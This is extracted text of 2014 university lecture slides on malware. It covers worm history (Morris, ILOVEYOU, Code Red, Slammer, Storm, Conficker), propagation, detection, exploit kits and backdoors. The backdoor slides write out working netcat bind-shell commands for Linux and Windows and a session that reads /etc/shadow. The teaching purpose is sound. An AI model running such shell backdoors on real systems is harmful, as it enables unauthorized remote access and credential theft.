1

CSCD 434Spring 2014

Lecture 9aAttacks

Worms, Trojans, Backdoors

Introduction• Today, cover malware– Worms, Trojan Horses/ Backdoors– Define Rootkits, viruses - Cover later– Nearly all of these infect computers via the

network• Email counts as a form of remote infection

– If you do decide to write one for fun don’t release it … could get into trouble ...

2

3

Definitions• Worm– Replicates itself, stand alone program,

spreads via a network• Virus– Program that attaches itself to another

program– Replicates itself, program must be run

• Trojan horse– Program that pretends to do one thing

but does something behind the scenes• Rootkit - A root kit is a component that

uses stealth to maintain a persistent and undetectable presence on the machine

Almost 30 years of Malware

5

Purpose of Malware

• What is the main purpose of most modern malware?

• Profit!!!!• Modern malware is a for-profit, big-business

undertaking• Online criminals invest significant amounts of

money and time in more efficient malware and better malware distribution mechanisms because financial rewards can be enormous

• According to a report issued by research company Computer Economics, the direct damage attributed to malware totaled $13 billion globally in 2006

http://www.computereconomics.com/article.cfm?id=1225

6

Purpose of Malware

• How is it distributed these days?• Malware has been part of computing for

decades• In the 1990s, Floppy Disks it got onto

your computer or network when you stuck an infected floppy disk into your drive,

• Then, Email becoming more prevalent, hackers designed malware to spread as infected email attachments

• Today,Internet is a fantastic distribution mechanism for malware

7

Worms

Worms

• A worm is self-replicating software designed to spread through the network

Typically, exploit security flaws in widely used services ... mostly buffer overflows

Causes massive damage Launch DDOS attacks, Install bot networks Access sensitive information Used for spam

Worms

•Worm vs Virus vs Trojan horse A virus is code embedded in a file or

program Viruses and Trojan horses rely on

humans• Human must access file or run program

Worms are often self-contained and may spread autonomously ... and they do!• Can also spread via email, Internet

Worms Spread?

• Copy itself directly across the network• Read your address book – Emails itself to everyone in your address

book–How easy is it to do this?–Microsoft outlook – was trivial < 5 lines of code to send out an email – Can cause outlook to send emails without

user awareness– Reason why so many worms for Outlook

Historical Worm Examples

12

Morris Worm• First appeared in 1988• Purpose –Determine where it could spread– Spread its infection– Remain undiscovered

• Robert Morris claimed his worm had a bug…• The Morris worm tried to re-infect

systems– Led to resource exhaustion

13

Morris Worm How did it spread? Multi-vector Attack Capability!!!• Tried to obtain access to machine by…– User account password guessing– Exploited buffer overflow in fingerd, identifies

users– Exploited debug code in sendmail

• Flaws in fingerd and sendmail were well- known at the time, but not widely patched

14

Morris Worm

• Once access had been obtained to machine…

• “Bootstrap loader” sent to victim– Consisted of 99 lines of C code

• Victim machine compiled and executed code

• Bootstrap loader fetched the rest of worm

15

Morris Worm•Why was it successful?–For its time, it was truly sophisticated in its behavior

• If transmission of worm was interrupted, all code was deleted

• Code encrypted when downloaded• Code deleted after decrypting and

compiling• When running, worm regularly

changed its name and process identifier (PID)

I-Love-You Worm

• e-mail worm arrived May 4, 2000,subject of "ILOVEYOU" and an attachment– LOVE-LETTER-FOR-YOU.TXT.vbs

I-Love-You Worm

• LOVE-LETTER-FOR-YOU.TXT.vbs–Upon opening attachment, software sent

copy of itself to everyone in user's address list, posing as user• Overwrote all these files types:• VBS, VBE, JS, JSE, CSS, WSH, SCT, HTA, JPG,

JPEG, MP3, and MP2• Overwritten files contain worm's body and

extensions changed to vbs

I-Love-You Worm How did it spread? • Sent a copy of itself to first 50 addresses in

Windows Address Book used by Microsoft Outlook

•Why was it successful?• Took advantage of Microsoft's practice for hiding file

extensions. Windows had begun hiding extensions by default

• Entice users to open attachment, ensure continued propagation

• Exploited systemic weaknesses in design of Microsoft Outlook and Microsoft Windows which led to unused features easily running malicious code capable of achieving complete access to operating system

slide 19

Code Red 1 V1 July 13, 2001: First worm of modern era Exploited buffer overflow in Microsoft’s Internet Information Server (IIS)

How did it spread? 1st through 20th of each month: Spread

Find new targets by random scan of IP address space Spawn 99 threads to generate addresses and look for

IIS Creator forgot to seed random number generator,

and every copy scanned same set of addresses ... Oops

21st through the end of each month: Attack

Defaced websites with “HELLO! Welcome to http://www.worm.com! Hacked by Chinese!”

slide 20

Code Red 1 V2

• July 19, 2001: Same codebase as Code Red 1, but fixed the bug in random IP address generation– Compromised all vulnerable IIS servers on

Internet– Fast spread• Scanned address space grew exponentially• 350,000 hosts infected in 14 hours!!

• Payload: distributed packet flooding (denial of service) attack on www.whitehouse.gov

slide 21

• August 4, 2001: Same IIS vulnerability, completely different code, kills Code Red I– Known as “Code Red II” because of

comment in code–Worked only on Windows 2000, crashed NT

• Scanning algorithm preferred nearby addresses– Chose addresses from same class A with

probability ½, same class B with probability 3/8, and randomly from the entire Internet with probability 1/8

• Payload: installed root backdoor in IIS servers for unrestricted remote access

• Died by design on October 1, 2001

Code Red 2

22

Code Red 2 kills off Code

Red 1

Code Red 2 settles into

weekly pattern

Nimda enters the ecosystem

Code Red 2 dies off as

programmed

CR 1 returns thanksto bad clocks

Slides: Vern Paxson

SQL Slammer• Another modern worm …• SQL Slammer, January 2003– Although titled "SQL slammer worm",

program didn't use SQL language• How did it work?• Exploited buffer overflow bug in Microsoft's

SQL Server and Desktop Engine database products, for which patch had been released six months earlier • Affected Microsoft SQL 2000

– Vulnerable population, 75,000 machines infected in less than 10 minutes

http://en.wikipedia.org/wiki/SQL_slammer_worm http://www.die.net/musings/sql_slammer/

slide 24

05:29:00 UTC, January 25, 2003[from Moore et al. “The Spread of the Sapphire/Slammer Worm”]

slide 25

30 Minutes Later

Size of circles is logarithmic inthe number of infected machines

[from Moore et al. “The Spread of the Sapphire/Slammer Worm”]

slide 26

Secret of Slammer’s Speed

• Why was it successful?• Old-style worms (Code Red) spawn a new

thread which tries to establish TCP connection• If successful, send a copy of itself over TCP–Limited by latency of the network

• Slammer, improved concept, connectionless UDP worm–No connection establishment, simply sent 404-byteUDP packet to randomly generated IP addresses–Limited only by bandwidth of the network

Modern Day Worms

Modern WormsDon't Just Spread

• Old-Style Worms–Mostly to spread, very noticeable in attacks–How fast and far can we go?– Sometimes, dropped other malware to

maintain access

• Modern Worms – Stealthier– Always have payload of more malware–Many infection vectors - not just one–Use resources of machine, glean user

information

Modern WormsDon't Just Spread• These worms spread more subtly,–Without making noise– Symptoms don't appear immediately,

infected computer can sit dormant for a long time– If it were a disease,• More like syphilis, whose symptoms may

be mild or disappear altogether,• Eventually come back years later and eat

your brain !!– Bruce Schneir http://www.schneier.com/blog/archives/2007/10/

the_storm_worm.html

slide 30

Storm Worm 2007• How did it spread?• Spread by cleverly designed spam campaign– Arrived as an email with catchy subject• First instance:“230 dead as storm batters

Europe” • Other examples: “Condoleeza Rice has

kicked German Chancellor”, “Radical Muslim drinking enemies’s blood”, “Saddam Hussein alive!”, “Fidel Castro dead”, etc.

• Attachment or URL with malicious payload– FullVideo.exe, MoreHere.exe, ReadMore.exe, etc.– Also masquerade as flash postcards

• Once opened,• Installs trojan (wincom32) and rootkit !!!

slide 31

Storm Worm Characteristics

• Infected host joined Botnet• Obfuscated P2P control structure– Interacted with peers via eDonkey protocol

• Obfuscated code, anti-debugging defenses– Goes into infinite loop if detects VMware or

Virtual PC– Large number of spurious probes, evidence

of external analysis, triggers distributed DoS attack

• Infection Estimates– Between 1 million and 50 million computers

infected worldwide

Storm Worm Characteristics

• Storm's Payload• Morphed every 30 minutes or so,– Typical AV (antivirus) and IDS techniques less effective --- use code signatures to detect

• Storm e-mail also changed all the time, leveraging social engineering techniques – Always new subject lines and new enticing text

• Storm began attacking anti-spam sites focused on identifying it -- spamhaus.org, 419eater -- and the personal website of Joe Stewart, who publicized an analysis of Storm

joe stewart

Conficker Worm

http://www.confickerworkinggroup.org/wiki/pmwiki.php/ANY/InfectionDistribution

• Conficker.A first detected on 21 November 2008 and exploited MS08-067, below is infection as of 4/1/2009

MS08-067 Server Service Buffer OverflowThis service facilitates file, print, and named-pipe sharing over the network for Windows-based computersSuccessful exploitation may result in execution of arbitrary code on the target host with System privileges!!!!

Conficker Worm

• Conficker.B, detected in February 2009, added ability to spread through network shares and removable storage devices– USB drives and AutoRun function in Windows

• Conficker.C, shuts down security services, blocks computers from connecting to security Web sites, and downloads a Trojan

• Also reaches out to other infected computers via P2P networking– Includes list of 50,000 different domains, 500

will be contacted by infected computer on April 1 to receive updated copies or other malware or instructions

Conficker WormWhere did Conficker come from?– Ties to Russian Business Network

What is its purpose? Conficker's main purpose is to provide its' authors with a secure binary

update service that allows them instant control of the millions of infected PCs worldwide

Conficker disables Windows systems security services as well as third-party firewalls and anti-virus products, leaving systems in a vulnerable state which can lead to more infection and infiltration.

“In April, 2009 Cyber Secure Institute estimated that the economic cost of Conficker is as high as $9.1 billion based on the average cost for related malware incidents analyzed in their previous studies”

http://www.zdnet.com/blog/security/manchester-city-council-pays-2-4m-in-conficker-clean-up-costs/3690

• Is Conficker still a threat in 2013? YES. Currently is Still a problem. http://news.softpedia.com/news/Microsoft-Conficker-Still-a-Threat-Uses-Weak-Passwords-

to-Spread-266483.shtml

Worm Propagation Methods• Scanning worms - Worm chooses “random”

address• Coordinated scanning - Different worm

instances scan different addresses

• Meta-server worm Ask server for hosts to infect

• Topological worm - Uses information from infected hosts– Web server logs, email address books,

config files, SSH “known hosts”f

• Contagion worm - Propagates parasitically along with normally initiated communication

37

Worm Signature

• Monitor network and look for strings common to traffic with worm-like behavior

Signatures can then be used for content filtering

Slide: S Savage

38

Content Sifting

• Assume there exists some (relatively) unique invariant bitstring W across all instances of a particular worm

• Two Consequences Content Prevalence: W will be more common in

traffic than other bitstrings of the same length Address Dispersion: set of packets containing W will

address a disproportionate number of distinct sources and destinations

• Content sifting: Find W’s with high content prevalence and high address dispersion and drop that traffic …

• Any Problems with this?

39

Malicious Code

• Using Worms transformed into Botnets

• Hundreds of thousands of vulnerable computers are still being used to launch spam campaigns• 70 percent of all spam is now sent this way,

according to anti-spam firm Message Labs Inc.

• Perhaps 6 to 7 billion spam messages are routed through hacked home computers

40

Malicious Code• Attack Trends–Crossbreeding• Combo Malware raises threat, treats each

element as a building block• Malware developer of today constructs an

attack tool by selecting various blocks and combining them in a single piece of code–Worms used to spread backdoors– Bugbear.b worm, which appeared in

2003 featured several backdoors.– Blaster worm and Sobig.F virus also

installed backdoors

41

Malicious Code

• Attack Trends• Combo Malware ... far more likely to find

some hole in your defenses than single-trick malware• Fight combo malware, you need more than

your signature-based AV engine loaded on servers and desktops• You need to think in terms of holistic defense,

addressing multiple vulnerability points, hardening your overall network and preparing for the worst

Ed Skoudis

Attack Trends

Exploit Kits Exploit kits are a type of malicious toolkit

used to exploit security holes found in software applications (Adobe Reader, etc) for purpose of spreading malware

These kits come with pre-written exploit code and target users running insecure or outdated software applications on their computers

Kaspersky Labs states that MPack was one of the first publicly recorded kits available, released in late 2006 by Russian programmers

The kit went viral and was spotted on more than 10,000 websites shortly after release

Attack Trends Today’s modern exploit kit comes neatly

packaged by the author and does not require any knowledge of how an exploit works.

In addition, most exploit kits have a user-friendly web interface that allows licensed users to login and view active victims and statistics It is a very profitable trade for author to create

and manage these kits, as licenses can be very costly to purchase—as much as $10,000 per month—and these price tags are matched by an increasing demand. Even a typical kit usually costs around $500 a month

Attack TrendsExploit Kits

Acquiring a kit Due to their illicit nature, acquiring exploit kits can sometimes be difficult Most of these kits are only available in

underground black hat forums where they’re licensed directly from the author

These forums aren’t usually indexed in popular search engines, such as Google, and therefore can be difficult to find without doing a little digging first

http://blog.malwarebytes.org/intelligence/2013/02/tools-of-the-trade-exploit-kits/

45

Maintaining Access

• Once you have infected computer, • Gotten in through a vulnerability

• System or Human• Maintain Access Needs Stealth way back in ..

• Install a remote control backdoor to victim system• Backdoor allows attacker access in the

future

46

Backdoors

• What is a Backdoor?–Once penetrate machine through one

of the ways we talked about previously–Want to install a future access point– A backdoor is a way in to the system

that allows an attacker admission whenever they want

47

Backdoors• Example–Netcat tool• Claim that netcat is one of the most popular

backdoor tools in use today• Netcat when run on victim machine can be

configured to listen on any TCP port – Executes any program for traffic coming

in on that port–Will have same permission as account

from which netcat was executed– Can send it data and have it executed on

victim machine• Assume attacker has gained access to a

victim machine and wants to set up a command-shell backdoor

48

Backdoors Linux Example

$ nc –l –p 12345 –e /bin/sh (backdoor on victim_machine)

Runs the netcat program which listens on TCP port 12345

and executes shell with data sent on port 12345

$ nc victim_machine 12345 (client on attacker machine)

cmd: ls (will list contents of directory from victim machine)

sensitive_documents tools games

cmd: cat /etc/shadow (only works if user on victim has root)

49

Backdoors

• Example - Windows Machine• Can also use netcat on Windows machine• Instead of /bin/sh will use cmd.exe

C:\> nc –l –p 12345 –e cmd.exe (on victim machine)

Similar results!

50

Backdoors and Trojans

•Trojans Classic example:• Replace /bin/login - lets users log in to

system but saves passwords for later analysis

•Trojan Backdoor• Combination of a backdoor hiding inside of

a trojan program

References Code Project Stuxnet Analysis

http://www.codeproject.com/Articles/246545/Stuxnet-Malware-Analysis-Paper

Sans Confickerhttp://www.sans.org/security-resources/malwarefaq/conficker-

worm.php Malware Toolkits

http://blog.malwarebytes.org/intelligence/2013/02/tools-of-the-trade-exploit-kits/ Malware History – Nice document

http://download.bitdefender.com/resources/files/Main/file/Malware_History.pdf Malware Databases

http://www.exploit-db.com/http://packetstormsecurity.com/files/tags/exploit/

Malware Timeline http://malware.wikia.com/wiki/Timeline_of_noteworthy_computer_viruses,_worms_and_Trojan_horses

52

Summary

–Malware – Viruses, Worms and combinations including Trojan backdoor components are rampant– Continues to be a serious problem for

everyone using the Internet–Not just teenagers looking to brag

anymore• More and more the proliferation appears to

be related to the business of spamming

53

The End

There is a Malware Lab, on your own!!!!